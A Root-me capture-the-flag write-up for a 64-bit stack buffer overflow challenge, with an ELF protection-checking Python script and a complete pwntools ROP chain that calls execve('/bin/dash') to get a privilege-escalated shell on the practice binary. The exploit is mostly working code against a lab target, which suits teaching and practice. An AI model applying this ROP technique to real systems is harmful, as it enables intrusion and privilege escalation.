Root-me




ELF64 - Stack buffer overflow - advanced


char buffer[256]; gets(buffer); // the vulnerable part !!!!

As you may see it looks simple, but the problem is that it is protected by ASLR, NX, RELRO ... :(
So the only way is to do ROP or to overwrite the GOT table .. but I went on with ROP.
As this binary is 64-bit, the syscall table differs completely .. (which at first I didn't know, but ROPgadget helped me out)
So according to the syscall table: RAX=59, RDI='/bin/dash', RSI && RDX = *(NULL)
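As an added check (my own example, not part of the original writeup), here is a small Python script that reads an ELF64 image's program headers and reports the protections mentioned above: NX from PT_GNU_STACK, RELRO from PT_GNU_RELRO, and whether the binary is PIE (e_type ET_DYN). A non-PIE binary keeps fixed code and .data addresses even when the system has ASLR enabled, which is the property that makes absolute gadget addresses usable; the sample ELF image below is constructed inline, and running it on the real challenge binary is assumed, not shown.

```python
import struct

# ELF64 constants from the ELF / GNU ABI specs
ET_EXEC, ET_DYN = 2, 3            # fixed-address executable / position-independent
PT_GNU_STACK = 0x6474e551         # stack permissions (NX when PF_X is clear)
PT_GNU_RELRO = 0x6474e552         # region made read-only after relocation (RELRO)
PF_X = 1

def elf_protections(data: bytes) -> dict:
    """Report PIE / NX / RELRO from an ELF64 image's header and program headers."""
    if data[:4] != b'\x7fELF' or data[4] != 2:   # EI_CLASS 2 = ELFCLASS64
        raise ValueError('not an ELF64 image')
    end = '<' if data[5] == 1 else '>'           # EI_DATA 1 = little-endian
    e_type = struct.unpack_from(end + 'H', data, 16)[0]
    e_phoff = struct.unpack_from(end + 'Q', data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from(end + 'HH', data, 54)
    nx, relro = False, False     # no PT_GNU_STACK at all means an executable stack by default
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from(end + 'II', data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro = True
    # pie=False means code, gadgets and .data keep fixed addresses across runs even
    # with system ASLR on; only the stack, heap and shared libraries move.
    return {'pie': e_type == ET_DYN, 'nx': nx, 'relro': relro}

def build_sample_elf(e_type: int, stack_flags: int, relro: bool) -> bytes:
    """Constructed minimal ELF64 image (header + program headers only, no code)."""
    phdrs = [(PT_GNU_STACK, stack_flags)]
    if relro:
        phdrs.append((PT_GNU_RELRO, 4))          # PF_R
    ident = b'\x7fELF' + bytes([2, 1, 1]) + bytes(9)   # ELF64, little-endian, EV_CURRENT
    # e_type, e_machine (x86-64), e_version, e_entry, e_phoff, e_shoff, e_flags,
    # e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
    hdr = ident + struct.pack('<HHIQQQIHHHHHH', e_type, 62, 1, 0x400000,
                              64, 0, 0, 64, 56, len(phdrs), 64, 0, 0)
    body = b''.join(struct.pack('<IIQQQQQQ', t, f, 0, 0, 0, 0, 0, 0) for t, f in phdrs)
    return hdr + body

if __name__ == '__main__':
    import sys
    with open(sys.argv[1], 'rb') as f:          # e.g. the challenge binary
        print(elf_protections(f.read()))
```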


from pwn import *

context.bits = 64

p = b'A' * 280                              # padding up to the saved return address

# execve("/bin/dash", argv, envp) via ROP: build the string in .data first
p += pack(0x00000000004017e7)               # pop rsi ; ret
p += pack(0x00000000006c0000)               # @ .data
p += pack(0x000000000044d2b4)               # pop rax ; ret
p += b'/bin/das'                            # first 8 bytes of the string
p += pack(0x0000000000467b51)               # mov qword ptr [rsi], rax ; ret
p += pack(0x00000000004017e7)               # pop rsi ; ret
p += pack(0x00000000006c0008)               # @ .data + 8
p += pack(0x000000000044d2b4)               # pop rax ; ret
p += b'h\x00\x00\x00\x00\x00\x00\x00'       # "h" plus NUL terminator
p += pack(0x0000000000467b51)               # mov qword ptr [rsi], rax ; ret
p += pack(0x00000000004016d3)               # pop rdi ; ret
p += pack(0x00000000006c0000)               # @ .data -> rdi = "/bin/dash"
p += pack(0x00000000004017e7)               # pop rsi ; ret
p += pack(0x00000000006c0010)               # @ .data + 16
p += pack(0x000000000041bd9f)               # xor rax, rax ; ret
p += pack(0x0000000000467b51)               # mov qword ptr [rsi], rax ; ret -> NULL qword at .data + 16
p += pack(0x00000000004017e7)               # pop rsi ; ret
p += pack(0x00000000006c0010)               # @ .data + 16 -> rsi = pointer to NULL
p += pack(0x0000000000437205)               # pop rdx ; ret
p += pack(0x00000000006c0010)               # @ .data + 16 -> rdx = pointer to NULL
p += pack(0x000000000041bd9f)               # xor rax, rax ; ret
p += pack(0x000000000045aa10) * 59          # add rax, 1 ; ret (x59 -> rax = 59 = execve)
p += pack(0x0000000000400488)               # syscall

s = process('ch34')
s.send(p)
s.interactive()

NOTE: /bin//sh && /bin/bash gave me a local shell, but only /bin/dash gave a privilege-escalated shell :)

Also ROPgadget doesn't find all the gadgets (for ex: syscall ; ret), so I found that using rp++



For future reference:
link for the 64-bit syscall table: http://blog.rchapman.org/posts/..
link for the 32-bit syscall table: http://syscalls.kernelgrok.com/